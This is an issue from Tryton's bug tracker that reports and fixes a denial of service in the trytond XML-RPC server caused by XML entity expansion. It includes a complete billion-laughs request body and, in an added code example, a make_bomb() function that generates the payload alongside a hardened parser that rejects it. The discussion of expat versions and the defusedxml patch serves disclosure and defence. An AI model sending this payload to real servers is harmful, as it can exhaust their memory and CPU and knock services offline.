Issue 11244

Title
A non-authenticated user can cause a denial of service with a single request using an XML bomb attack on XML-RPC
Priority
critical
Status
resolved
Nosy list
ced, jeremy.mousset, nicoe, pokoli, reviewbot, roundup-bot, yangoon
Assigned to
ced
Keywords
review

Created on 2022-02-11.13:03:34 by jeremy.mousset, last changed 7 months ago by roundup-bot.

Messages

New changeset 69e8f18f5682 by Cédric Krier in branch 'default':
Protect against XML vulnerabilities
https://hg.tryton.org/tryton-env/rev/69e8f18f5682

New changeset a64ca55b86e3 by Cédric Krier in branch 'default':
Protect against XML vulnerabilities
https://hg.tryton.org/trytond/rev/a64ca55b86e3

New changeset 2ef295408a0b by Cédric Krier in branch '6.2':
Protect against XML vulnerabilities
https://hg.tryton.org/trytond/rev/2ef295408a0b

New changeset b8e700d01652 by Cédric Krier in branch '6.0':
Protect against XML vulnerabilities
https://hg.tryton.org/trytond/rev/b8e700d01652

New changeset d0744bba5682 by Cédric Krier in branch '5.0':
Protect against XML vulnerabilities
https://hg.tryton.org/trytond/rev/d0744bba5682

New changeset f801a89c84e7 by Cédric Krier in branch 'default':
Protect against XML vulnerabilities
https://hg.tryton.org/proteus/rev/f801a89c84e7

New changeset e4019b6ca238 by Cédric Krier in branch '6.2':
Protect against XML vulnerabilities
https://hg.tryton.org/proteus/rev/e4019b6ca238

New changeset 973635df5e61 by Cédric Krier in branch '6.0':
Protect against XML vulnerabilities
https://hg.tryton.org/proteus/rev/973635df5e61

New changeset 85eb95f609cf by Cédric Krier in branch '5.0':
Protect against XML vulnerabilities
https://hg.tryton.org/proteus/rev/85eb95f609cf

Author: [hidden] (ced) Tryton committer Tryton translator
Date: 2022-02-22.22:54:49

I propose March 1st to make the security release (with the existing bugfix) and March 2nd to make the announcement.

Author: [hidden] (jeremy.mousset)
Date: 2022-02-14.10:38:45

I have pyexpat.EXPAT_VERSION : 'expat_2.2.8'

Author: [hidden] (ced) Tryton committer Tryton translator
Date: 2022-02-12.17:30:29

Indeed the Debian version with which we build the Tryton docker images still does not have a fixed expat. So it still makes sense to apply defusedxml in trytond and proteus.
I do not think we need to do it for tryton because the Windows and macOS builds use fixed expat libraries, and also we only parse XML from the user or the server (which are controlled).

Author: [hidden] (ced) Tryton committer Tryton translator
Date: 2022-02-12.15:14:42

Indeed, normally the stdlib should not be vulnerable to billion laughs if used with expat >= 2.4.1. Which version (pyexpat.EXPAT_VERSION) do you have?

Author: [hidden] (ced) Tryton committer Tryton translator
Date: 2022-02-11.13:29:15

For me it is similar to issue11219 and should be fixed together.
Indeed we should apply the monkey patch on trytond, which uses xmlrpc.client to parse XML-RPC requests, and on proteus, which can be used as an XML-RPC client.

Author: [hidden] (jeremy.mousset)
Date: 2022-02-11.13:03:34

Tested against trytond 6.2 with Python 3.8.10

A non-authenticated user can saturate the trytond server's memory and CPU usage with a single XML-RPC request, using the billion laughs attack or other similar "XML bomb" attacks.

Request example (do not test it against a production server, of course :)):

url: http://example.trytond.com/
method: POST

headers:
Content-Type: text/xml

body:

<?xml version='1.0'?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ELEMENT lolz (#PCDATA)>
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
 <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<methodCall>
<methodName>&lol9;</methodName>
<params>
</params>
</methodCall>

When the trytond server receives the request, its RAM usage quickly skyrockets, and the CPU also becomes very busy.
When testing the request on my machine, the 16GB of RAM and 1 GB swap were full in under a minute.

defusedxml has a monkey patch for this.

If we use this monkey patch by adding the following to trytond/protocols/xmlrpc.py:

 from defusedxml.xmlrpc import monkey_patch
 monkey_patch()

then the server will respond to the same request with :

"400 Bad Request: Unable to read XML request"
(because the monkey patch forbids it).

So, it does look like a simple protection against this attack and similar "XML bomb" attacks.
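The protection discussed in this issue, rebuilt as an added example against the standard library only (this is neither trytond, proteus nor defusedxml code; it reproduces the idea behind defusedxml.xmlrpc.monkey_patch()): xmlrpc.client.ExpatParser keeps its pyexpat parser in the private attribute `_parser` (an assumption about CPython's stdlib, true for 3.8 through 3.12), so a subclass can install handlers that abort on the DOCTYPE itself, before any entity of the payload is declared or expanded. The bomb is generated from the same lol/lol1..lolN pattern as the reported request; `make_bomb`, `hardened_loads`, `stdlib_expansion` and `hardened_rejects` are names chosen for this example.

```python
"""Hardened XML-RPC unmarshalling against DTD / entity-based XML bombs.

Added example, not trytond, proteus or defusedxml code. It mirrors what
defusedxml.xmlrpc.monkey_patch() does: replace xmlrpc.client.ExpatParser
with a subclass whose expat handlers reject DOCTYPEs and entity declarations,
so a billion-laughs request is refused before a single entity is expanded.
"""
import xmlrpc.client


class EntitiesForbidden(ValueError):
    """Raised when an XML-RPC payload carries a DOCTYPE or an entity declaration."""


class HardenedExpatParser(xmlrpc.client.ExpatParser):
    """Drop-in for xmlrpc.client.ExpatParser that refuses DTDs and entities.

    Assumption: the stdlib class stores its pyexpat parser in self._parser
    (true for CPython 3.8 - 3.12). We only add rejecting handlers to it.
    """

    def __init__(self, target):
        super().__init__(target)
        parser = self._parser
        parser.StartDoctypeDeclHandler = self._reject_doctype
        parser.EntityDeclHandler = self._reject_entity
        parser.UnparsedEntityDeclHandler = self._reject_entity
        parser.ExternalEntityRefHandler = self._reject_external

    @staticmethod
    def _reject_doctype(name, sysid, pubid, has_internal_subset):
        # Fires on "<!DOCTYPE ..." before the internal subset is read, so the
        # lol1..lolN declarations of a billion-laughs payload never register.
        raise EntitiesForbidden("DOCTYPE %r is not allowed in XML-RPC" % name)

    @staticmethod
    def _reject_entity(name, *_decl):
        # Covers both EntityDeclHandler (7 args) and UnparsedEntityDeclHandler (5 args).
        raise EntitiesForbidden("entity %r is not allowed in XML-RPC" % name)

    @staticmethod
    def _reject_external(context, base, sysid, pubid):
        raise EntitiesForbidden("external entity %r is not allowed in XML-RPC" % sysid)


def hardened_loads(data):
    """Same contract as xmlrpc.client.loads(): returns (params, methodname)."""
    target = xmlrpc.client.Unmarshaller()
    parser = HardenedExpatParser(target)
    parser.feed(data)
    parser.close()
    return target.close(), target.getmethodname()


def make_bomb(depth, fanout=10):
    """Constructed billion-laughs XML-RPC request; depth=9 is the reported payload."""
    decls = ['<!ENTITY lol "lol">']
    for level in range(1, depth + 1):
        previous = "lol" if level == 1 else "lol%d" % (level - 1)
        decls.append('<!ENTITY lol%d "%s">' % (level, ("&%s;" % previous) * fanout))
    body = "<methodCall><methodName>&lol%d;</methodName><params></params></methodCall>" % depth
    return "<?xml version='1.0'?>\n<!DOCTYPE lolz [\n%s\n]>\n%s" % ("\n".join(decls), body)


def stdlib_expansion(depth):
    """Parse a *small* bomb with the unpatched stdlib; return the expanded methodName length.

    The expansion is 3 * fanout**depth bytes: depth 3 is 3000 bytes, depth 9 is 3 GB.
    Never call this with the full depth on a box you care about.
    """
    _params, method = xmlrpc.client.loads(make_bomb(depth))
    return len(method)


def hardened_rejects(depth):
    """True when the hardened parser refuses the bomb without expanding anything."""
    try:
        hardened_loads(make_bomb(depth))
    except EntitiesForbidden:
        return True
    return False


PLAIN_CALL = (
    "<?xml version='1.0'?>"
    "<methodCall><methodName>system.listMethods</methodName><params></params></methodCall>"
)


if __name__ == "__main__":
    print("stdlib, depth 3:", stdlib_expansion(3), "bytes of methodName")  # 3000
    print("hardened, depth 9 rejected:", hardened_rejects(9))  # True
    print("hardened, plain call:", hardened_loads(PLAIN_CALL))  # ((), 'system.listMethods')
```

The rejection happens in the parser callbacks, so it does not depend on the expat version: it protects a build linked against expat < 2.4.1 (the Debian situation mentioned above) and, because external entity references are refused as well, also shuts the door on DTD-based external-entity tricks, which the expat 2.4.1 amplification limit alone does not. Legitimate XML-RPC never needs a DOCTYPE, so rejecting it outright costs nothing.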

History
Date                 User            Action  Args
2022-03-01 19:58:29  roundup-bot     set     messages: + msg74388
2022-03-01 19:57:57  roundup-bot     set     messages: + msg74386
2022-03-01 19:57:13  roundup-bot     set     messages: + msg74384
                                             status: testing -> resolved
2022-02-22 22:54:49  ced             set     messages: + msg74306
2022-02-14 10:38:45  jeremy.mousset  set     messages: + msg74099
2022-02-12 17:30:29  ced             set     messages: + msg74062
2022-02-12 15:14:42  ced             set     messages: + msg74055
2022-02-11 13:29:15  ced             set     assignedto: ced
                                             component: + trytond, proteus
                                             keyword: + review
                                             messages: + msg74017
                                             reviews: 381941002
                                             status: unread -> testing
2022-02-11 13:12:55  jeremy.mousset  set     title: A non authenticated use can cause a denial of service with a single request using an xml bomb attack on xmlrpc -> A non authenticated user can cause a denial of service with a single request using an xml bomb attack on xmlrpc
2022-02-11 13:03:34  jeremy.mousset  create